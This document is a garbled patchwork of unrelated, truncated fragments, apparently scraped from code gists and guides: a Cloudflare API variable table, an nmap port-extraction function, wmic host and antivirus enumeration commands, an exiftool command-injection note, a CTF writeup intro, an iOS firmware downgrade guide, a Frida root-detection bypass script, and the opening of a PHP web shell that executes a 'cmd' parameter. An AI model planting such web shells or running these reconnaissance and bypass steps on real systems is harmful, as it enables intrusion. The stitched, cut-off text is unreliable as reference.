VARIABLE | VALUE |
---|---|
The email address associated with your Cloudflare account. | |
KEY | The global API key associated with your Cloudflare account. |
DOMAIN | The name of the domain to create a zone record for. |
JUMP_START | If true, automatically attempts to fetch existing DNS records when creating a domain’s zone record |
ZONE_ID | The unique ID of the domain’s zone record. Assigned by Cloudflare. Required when managing an existing zone record and its DNS records. |
# Used: | |
# nmap -p- --open -T5 -v -n ip -oG allPorts | |
# Extract nmap information | |
# Run as: | |
# extractPorts allPorts | |
function extractPorts(){ | |
ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" | |
ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" | |
echo -e "\n[*] Extracting information...\n" > extractPorts.tmp |
Host Enumeration: | |
--- OS Specifics --- | |
wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
wmic computersystem LIST full | |
--- Anti-Virus --- | |
wmic /namespace:\\root\securitycenter2 path antivirusproduct |
Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character |
and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command.
Exiftool is a "a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files." One of its features is being able to read metadata of compressed images. The code for this is GetImageInfo
in exiftool
:
sub GetImageInfo($$)
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');
Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
Futurerestore is a tool that allows users to upgrade, downgrade, or re-restore their iOS device to an unsigned firmware through the use of SHSH2 blobs. This guide will teach you how to use Futurerestore in order to upgrade, downgrade, or re-restore to an unsigned firmware.
Before continuing, keep in mind that this guide is based off of this one, and contains information that can change your device's behavior or even damage it. With that in mind, please read the guide fully, as no one but YOU will be held responsible for any damage caused to your device.
Throughout the entirety of this guide, keep in mind that:
- iOS 13.1.3's SEP and Baseband are NOT compatible with iOS 12.x for all devices. This means that you're NOT able to upgrade, downgrade, or re-restore A10-A12X devices back to iOS 12.x. Attempting to use an incompatible SEP and Baseband will cause Futureresto
Important: Please don't use the comment section to ask for help. Join r/jailbreak (
#genius-bar
) or FDR Bureau (#futurerestore-support
) instead.
This is a guide for downgrading (or upgrading) to unsigned versions with futurerestore on checkm8 devices (A11 and below). You must have blobs for the version you want to go to, and SEP/BB compatibility may limit how far you can go.
The latest SEP/BB as of right now is iOS 15.4.1.
// $ frida -l antiroot.js -U -f com.example.app --no-pause | |
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh): | |
// - I added extra whitelisted items to deal with the latest versions | |
// of RootBeer/Cordova iRoot as of August 6, 2019 | |
// - The original one just fucked up (kill itself) if Magisk is installed lol | |
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
Java.perform(function() { | |
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
<html> | |
<body> | |
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
<input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
<input type="SUBMIT" value="Execute"> | |
</form> | |
<pre> | |
<?php | |
if(isset($_GET['cmd'])) | |
{ |